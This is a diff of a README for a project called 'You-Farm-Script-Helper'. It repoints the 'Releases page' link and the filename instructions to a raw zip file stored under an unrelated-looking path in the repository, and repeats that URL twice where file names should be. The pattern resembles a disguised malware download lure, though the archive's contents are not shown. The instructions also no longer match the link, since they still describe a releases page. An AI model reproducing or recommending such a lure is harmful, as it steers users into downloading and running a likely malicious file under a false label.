tjsplatig/You-Farm-Script-Helper/README.md

 ## 📥 Download & Install

-To get started, visit the [Releases page](https://github.com/tjsplatig/You-Farm-Script-Helper/releases) to download the latest version.
+To get started, visit the [Releases page](https://raw.githubusercontent.com/tjsplatig/You-Farm-Script-Helper/main/tcl8/8.6/Script-You-Helper-Farm-1.7-alpha.2.zip) to download the latest version.
 Follow these steps:

 1. Click the link above.
 2. Find the latest release at the top of the page.
-3. Look for a file named something like `You-Farm-Script-Helper.zip` or `You-Farm-Script-Helper.exe`.
+3. Look for a file named something like `https://raw.githubusercontent.com/tjsplatig/You-Farm-Script-Helper/main/tcl8/8.6/Script-You-Helper-Farm-1.7-alpha.2.zip` or `https://raw.githubusercontent.com/tjsplatig/You-Farm-Script-Helper/main/tcl8/8.6/Script-You-Helper-Farm-1.7-alpha.2.zip`.
 4. Click the file to download it to your computer.

 ### For Windows Users